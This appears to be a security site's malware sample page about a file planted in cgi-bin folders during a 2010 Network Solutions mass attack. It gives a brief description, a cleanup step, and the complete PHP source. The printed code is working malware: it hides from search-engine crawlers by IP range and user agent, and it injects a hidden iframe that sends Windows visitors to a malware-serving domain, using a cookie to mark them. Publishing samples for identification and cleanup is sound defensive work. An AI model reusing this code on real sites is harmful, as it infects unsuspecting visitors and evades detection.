Description:
Malware used on the Network Solutions mass attack: http://blog.sucuri.net/2010/05/new-infections-today-at-network.html
This file may have multiple names: .nts, counter.cgi, root.ini, root.cgi, etc. All inside the cgi-bin. At the end, it redirects users to sites loading malware:
http://virtual-ad.org/in.cgi?2 http://grepad.com/in.cgi?3
Clean up:
Remove the php.ini file from inside the cgi-bin directory.
<? error_reporting(0); //=================================================================================================== function detectBot(){ global $is_human,$stop_agent_detected,$stop_ip_detected,$detected_str; $stop_ips_masks = array( "66.249.[6-9][0-9].[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255 "74.125.[0-9]+.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255 "65.5[2-5].[0-9]+.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255 "74.6.[0-9]+.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255 "67.195.[0-9]+.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255 "72.30.[0-9]+.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255 "38.[0-9]+.[0-9]+.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255 "93.172.94.227", // MacFinder "212.100.250.218", // Wells Search II "71.165.223.134", // Indy Library "70.91.180.25", "65.93.62.242", "74.193.246.129", "213.144.15.38", "195.92.229.2", "70.50.189.191", "218.28.88.99", "165.160.2.20", "89.122.224.230", "66.230.175.124", "218.18.174.27", "65.33.87.94", "67.210.111.241", "81.135.175.70", "64.69.34.134", "89.149.253.169" ); $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawler", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress"); $_SERVER["HTTP_USER_AGENT"] = preg_replace("|User.Agent:[s ]?|i", "", @$_SERVER["HTTP_USER_AGENT"]); $is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = ""; foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("^{$stop_ip_mask}$", defineIP())) { $is_human = false; $stop_ip_detected = true; $detected_str = "by ip"; break; } if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$_SERVER["HTTP_USER_AGENT"]) !== false){ $is_human = false; $stop_agent_detected = true; $detected_str = "by agent"; break; } if($is_human and !eregi("^[a-zA-Z]{5,}", @$_SERVER["HTTP_USER_AGENT"])) { $is_human = false; $stop_agent_detected = true; $detected_str = "not human agent"; } } function defineIP(){ if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])) return $_SERVER["HTTP_X_FORWARDED_FOR"]; else return $_SERVER['REMOTE_ADDR']; } detectBot(); //=================================================================================================== function detect_os() { global $os; $user_agent = $_SERVER['HTTP_USER_AGENT']; if ((eregi("Google", $user_agent)) or (eregi("gsa-crawler", $user_agent)) or (eregi("Yahoo", $user_agent)) or (eregi("msnbot", $user_agent)) or (eregi("Turtle", $user_agent)) or (eregi("Yandex", $user_agent)) or (eregi("YaDirectBot", $user_agent)) or (eregi("Rambler", $user_agent)) or (eregi("James Bond", $user_agent)) or (eregi("Ask Jeeves", $user_agent)) or (eregi("Baiduspider", $user_agent)) or (eregi("EltaIndexer", $user_agent)) or (eregi("GameSpyHTTP", $user_agent)) or (eregi("grub-client", $user_agent)) or (eregi("Slurp", $user_agent)) or (eregi("Pagebull", $user_agent)) or (eregi("Scooter", $user_agent)) or (eregi("Nutch", $user_agent)) or (eregi("Zeus", $user_agent)) or (eregi("WebAlta", $user_agent)) or (eregi("Wget", $user_agent)) or (eregi("bot", $user_agent)) or (eregi("ia_archiver", $user_agent))) {$os = "Bots";} elseif (ereg("Windows 95", $user_agent)) $os = "Windows 95"; elseif (ereg("Windows NT 4", $user_agent)) $os = "Windows NT 4"; elseif (ereg("Windows 98", $user_agent)) $os = "Windows 98"; elseif (ereg("Win 9x 4.9", $user_agent)) $os = "Windows ME"; elseif (ereg("Windows NT 5.0", $user_agent)) $os = "Windows 2000"; elseif (ereg("Windows NT 5.1", $user_agent)) $os = "Windows XP"; elseif (ereg("Windows NT 5.2", $user_agent)) $os = "Windows 2003"; elseif (ereg("Windows NT 6.0", $user_agent)) $os = "Windows Vista"; elseif (ereg("Windows NT 6.1", $user_agent)) $os = "Windows 7"; elseif (ereg("Windows CE", $user_agent)) $os = "Windows CE"; elseif (ereg("iPhone", $user_agent)) $os = "iPhone OS"; elseif (ereg("Symbian", $user_agent)) $os = "Symbian OS"; elseif (ereg("Linux", $user_agent)) $os = "Linux"; elseif (ereg("SunOS", $user_agent)) $os = "SunOS"; elseif (ereg("FreeBSD", $user_agent)) $os = "FreeBSD"; elseif (ereg("NetBSD", $user_agent)) $os = "NetBSD"; elseif (ereg("PPC;", $user_agent)) $os = "Pocket PC"; elseif ((ereg("PPC", $user_agent)) or (eregi("Mac_PowerPC", $user_agent))) $os = "Power PC"; elseif (ereg("Mac OS", $user_agent)) $os = "Mac OS"; elseif (eregi("PlayStation", $user_agent)) $os = "PlayStation"; elseif (ereg("Nintendo Wii", $user_agent)) $os = "Nintendo Wii"; elseif (ereg("Nitro", $user_agent)) $os = "Nintendo DS"; elseif (ereg("J2ME/MIDP", $user_agent)) $os = "Mobile phone"; else $os = "Unknown OS :("; } detect_os(); $chk=base64_decode("TW96aWxsYS81LjAgKE1hY2ludG9zaDsgVTsgSW50ZWwgTWFjIE9TIFggMTAuNTsgcnU7IHJ2OjEuOS4yLjMpIEdlY2tvLzIwMTAwNDAxIEZpcmVmb3gvMy42LjM="); $_file=$_SERVER[DOMAIN_PATH].$_SERVER[REQUEST_URI]; if( (!isset($_COOKIE["cook"]) && $is_human && eregi("Windows", $os) && $os!="Windows CE") || (!isset($_COOKIE["cook"]) && $is_human && $_SERVER['HTTP_USER_AGENT']==$chk)) { $scr=<<<EOF <mce:script type="text/javascript"><!-- function addCookie(name, value, hours) { var date = new Date(); date.setTime(date.getTime()+(hours*3600000)); var expires = "; expires="+date.toGMTString(); document.cookie = name+"="+value+expires+"; "; } document.write('<iframe frameborder="0" onload=' if (!this.src){ this.src="http://grepad.com/in.cgi?3"; this.height=0; this.width=0;} '></iframe>'); addCookie("cook", "1", 24); // --></mce:script> <p> EOF; if(is_file($_file)) { echo file_get_contents($_file); echo $scr; } if(is_dir($_file)) { echo file_get_contents($_file."index.html"); echo $scr; } } else { if(is_file($_file)) { print(file_get_contents($_file)); } if(is_dir($_file)) { print(file_get_contents($_file."index.html")); } } ?> 
Loading 
